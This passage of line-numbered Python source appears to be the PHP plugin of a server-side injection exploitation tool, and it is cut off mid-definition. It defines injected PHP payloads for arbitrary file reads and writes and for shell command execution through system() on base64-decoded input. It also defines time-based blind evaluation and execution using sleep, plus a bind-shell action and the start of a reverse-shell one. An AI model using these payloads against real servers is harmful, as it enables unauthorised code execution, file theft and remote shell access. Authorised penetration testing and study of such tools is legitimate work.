(self)
| 12 | |
| 13 | |
| 14 | def language_init(self): |
| 15 | |
| 16 | self.update_actions({ |
| 17 | 'render' : { |
| 18 | 'call': 'inject', |
| 19 | 'render': """%(code)s""", |
| 20 | 'header': """print_r('%(header)s');""", |
| 21 | 'trailer': """print_r('%(trailer)s');""", |
| 22 | 'test_render': 'print(%(r1)s);' % { |
| 23 | 'r1' : rand.randints[0] |
| 24 | }, |
| 25 | 'test_render_expected': '%(r1)s' % { |
| 26 | 'r1' : rand.randints[0] |
| 27 | } |
| 28 | }, |
| 29 | 'write' : { |
| 30 | 'call' : 'evaluate', |
| 31 | 'write' : """$d="%(chunk_b64)s"; file_put_contents("%(path)s", base64_decode(str_pad(strtr($d, '-_', '+/'), strlen($d)%%4,'=',STR_PAD_RIGHT)),FILE_APPEND);""", |
| 32 | 'truncate' : """file_put_contents("%(path)s", "");""" |
| 33 | }, |
| 34 | 'read' : { |
| 35 | 'call': 'evaluate', |
| 36 | 'read' : """print(base64_encode(file_get_contents("%(path)s")));""" |
| 37 | }, |
| 38 | 'md5' : { |
| 39 | 'call': 'evaluate', |
| 40 | 'md5': """is_file("%(path)s") && print(md5_file("%(path)s"));""" |
| 41 | }, |
| 42 | 'evaluate' : { |
| 43 | 'call': 'render', |
| 44 | 'evaluate': """%(code)s""", |
| 45 | 'test_os' : 'echo PHP_OS;', |
| 46 | 'test_os_expected': '^[\w-]+$' |
| 47 | }, |
| 48 | 'execute' : { |
| 49 | 'call': 'evaluate', |
| 50 | 'execute': """$d="%(code_b64)s";system(base64_decode(str_pad(strtr($d,'-_','+/'),strlen($d)%%4,'=',STR_PAD_RIGHT)));""", |
| 51 | 'test_cmd': bash.echo % { 's1': rand.randstrings[2] }, |
| 52 | 'test_cmd_expected': rand.randstrings[2] |
| 53 | }, |
| 54 | 'blind' : { |
| 55 | 'call': 'evaluate_blind', |
| 56 | 'test_bool_true' : """True""", |
| 57 | 'test_bool_false' : """False""" |
| 58 | }, |
| 59 | 'evaluate_blind' : { |
| 60 | 'call': 'inject', |
| 61 | 'evaluate_blind': """$d="%(code_b64)s";eval("return (" . base64_decode(str_pad(strtr($d, '-_', '+/'), strlen($d)%%4,'=',STR_PAD_RIGHT)) . ") && sleep(%(delay)i);");""" |
| 62 | }, |
| 63 | 'execute_blind' : { |
| 64 | 'call': 'inject', |
| 65 | 'execute_blind': """$d="%(code_b64)s";system(base64_decode(str_pad(strtr($d, '-_', '+/'), strlen($d)%%4,'=',STR_PAD_RIGHT)). " && sleep %(delay)i");""" |
| 66 | }, |
| 67 | 'bind_shell' : { |
| 68 | 'call' : 'execute_blind', |
| 69 | 'bind_shell': bash.bind_shell |
| 70 | }, |
| 71 | 'reverse_shell' : { |